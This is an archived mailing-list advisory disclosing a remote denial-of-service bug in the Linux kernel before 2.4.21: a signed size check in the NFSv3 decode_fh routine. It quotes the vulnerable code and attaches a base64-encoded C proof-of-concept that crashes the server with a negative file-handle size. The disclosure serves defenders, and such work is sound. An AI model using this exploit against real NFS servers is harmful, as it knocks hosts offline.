TUCoPS :: Linux :: General :: bt758.txt

Remote Linux Kernel < 2.4.21 DoS in XDR routine. 


---559023410-758783491-1059444170=:12158
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.GSO.4.44.0307291254332.2559@gere.odin.pdx.edu>


Hello all,

I have discovered a signed/unsigned issue in a routine responsible for
demarshalling XDR data for NFSv3 procedure calls. As far as I can tell,
this bug has existed since NFSv3 support was integrated. It has been
silently fixed in 2.4.21.

The bug is in the decode_fh routine of fs/nfsd/nfs3xdr.c under the kernel
source tree.

Vulnerable code:

static inline u32 *
decode_fh(u32 *p, struct svc_fh *fhp)
{
        int size;
        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);
        if (size > NFS3_FHSIZE)
                return NULL;

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
}

Where p is a packet of attacker controlled XDR data. If size is made to be
negative, the sanity check is passed and the malicious value is passed to
memcpy. Due to the behavior of the kernel's memcpy, this will cause a very
large copy in kernel space, resulting in an instant kernel panic.

The attached code is a POC of this vulnerability. It requires that the
vulnerable host has an exported directory available to the attacker. This
is probably not the only way to manifest this bug, however.

If you have any questions, please feel free to contact me.

Cheers,

Jared Stanbrough <jareds@pdx.edu>

---559023410-758783491-1059444170=:12158
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="knfsd_dos.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.GSO.4.44.0307281902500.12158@gere.odin.pdx.edu>
Content-Description: 
Content-Disposition: ATTACHMENT; FILENAME="knfsd_dos.c"

LyoNCiAgTGludXggMi40Lngga25mc2Qga2VybmVsIHNpZ25lZC91bnNpZ25l

ZCBkZWNvZGVfZmggRG9TDQogIEF1dGhvcjogamFyZWQgc3RhbmJyb3VnaCA8

amFyZWRzQHBkeC5lZHU+IA0KICBEYXRlOiAwNy8xOS8yMDAzDQogIA0KICBW

dWxuZXJhYmxlIGNvZGU6IChmcy9uZnNkL25mczN4ZHIuYyBsaW5lIDUyLTY0

KQ0KDQogIHN0YXRpYyBpbmxpbmUgdTMyICoNCiAgZGVjb2RlX2ZoKHUzMiAq

cCwgc3RydWN0IHN2Y19maCAqZmhwKQ0KICB7DQogICAgICAgIGludCBzaXpl

Ow0KICAgICAgICBmaF9pbml0KGZocCwgTkZTM19GSFNJWkUpOw0KICAgICAg

ICBzaXplID0gbnRvaGwoKnArKyk7DQogICAgICAgIGlmIChzaXplID4gTkZT

M19GSFNJWkUpDQogICAgICAgICAgICAgICAgcmV0dXJuIE5VTEw7ICAgDQoN

CiAgICAgICAgbWVtY3B5KCZmaHAtPmZoX2hhbmRsZS5maF9iYXNlLCBwLCBz

aXplKTsNCiAgICAgICAgZmhwLT5maF9oYW5kbGUuZmhfc2l6ZSA9IHNpemU7

DQogICAgICAgIHJldHVybiBwICsgWERSX1FVQURMRU4oc2l6ZSk7DQogIH0N

Cg0KICBUaGlzIGNvZGUgaXMgY2FsbGVkIGJ5IHF1aXRlIGEgZmV3IFhEUiBk

ZWNvZGluZyByb3V0aW5lcy4gVGhlIGJlbG93DQogIFBPQyBkZW1vbnN0cmF0

ZXMgdGhlIHZ1bG5lcmFiaWxpdHkgYnkgZW5jb2RpbmcgYSBtYWxpY2lvdXMg

ZmhzaXplDQogIGF0IHRoZSBiZWdpbm5pbmcgb2YgYSBkaXJvcGFyZyB4ZHIg

YXJndW1lbnQuIA0KIA0KICBUbyB0ZXN0IHRoaXMsIHRoZSB2dWxuZXJhYmxl

IGhvc3QgbXVzdCBoYXZlIGFuIGFjY2Vzc2libGUgZXhwb3J0ZWQNCiAgZGly

ZWN0b3J5IHdoaWNoIHdhcyBwcmV2aW91c2x5IG1vdW50ZWQgYnkgdGhlIGF0

dGFja2VyLiBfSE9XRVZFUl8gDQogIGl0IG1heSBiZSBwb3NzaWJsZSB0byB0

cmlnZ2VyIHRoaXMgYnVnIGJ5IHNvbWUgb3RoZXIgbWV0aG9kLg0KDQogIEZp

eDogU2ltcGx5IGNoYW5nZSBzaXplIHRvIGFuIHVuc2lnbmVkIGludCwgb3Ig

Y2hlY2sgZm9yIHNpemUgPCAwLg0KKi8NCg0KI2luY2x1ZGUgPHJwY3N2Yy9u

ZnNfcHJvdC5oPg0KI2luY2x1ZGUgPHJwYy9ycGMuaD4NCiNpbmNsdWRlIDxy

cGMveGRyLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUg

PHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCg0KI2Rl

ZmluZSBORlNQUk9HIDEwMDAwMw0KI2RlZmluZSBORlNWRVJTIDMNCiNkZWZp

bmUgTkZTUFJPQ19HRVRBVFRSIDENCg0Kc3RhdGljIHN0cnVjdCBkaXJvcGFy

Z3MgaGVoOw0KDQpib29sX3QgeGRyX2hlaChYRFIgKnhkcnMsIGRpcm9wYXJn

cyAqaGVoKSANCnsNCiAgaW50MzJfdCB3ZXJkID0gLTE7IA0KICByZXR1cm4g

eGRyX2ludDMyX3QoeGRycywgJndlcmQpOw0KfQ0KDQppbnQgbWFpbih2b2lk

KQ0Kew0KICBDTElFTlQgKiBjbGllbnQ7DQogIHN0cnVjdCB0aW1ldmFsIHR2

Ow0KDQogIGNsaWVudCA9IGNsbnRfY3JlYXRlKCJtYXJkdWsiLCBORlNQUk9H

LCBORlNWRVJTLCAidWRwIik7DQogIA0KICBpZihjbGllbnQgPT0gTlVMTCkg

ew0KICAgICAgcGVycm9yKCJjbG50X2NyZWF0ZVxuIik7DQogIH0NCg0KICB0

di50dl9zZWMgPSAzOw0KICB0di50dl91c2VjID0gMDsNCiAgY2xpZW50LT5j

bF9hdXRoID0gYXV0aHVuaXhfY3JlYXRlX2RlZmF1bHQoKTsNCg0KICBjbG50

X2NhbGwoY2xpZW50LCBORlNQUk9DX0dFVEFUVFIsICh4ZHJwcm9jX3QpIHhk

cl9oZWgsIChjaGFyICopJmhlaCwNCiAgICAgICAgICAgICh4ZHJwcm9jX3Qp

IHhkcl92b2lkLCBOVUxMLCB0dik7DQoNCiAgcmV0dXJuIDA7DQp9DQogIA0K

IA0K
---559023410-758783491-1059444170=:12158--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH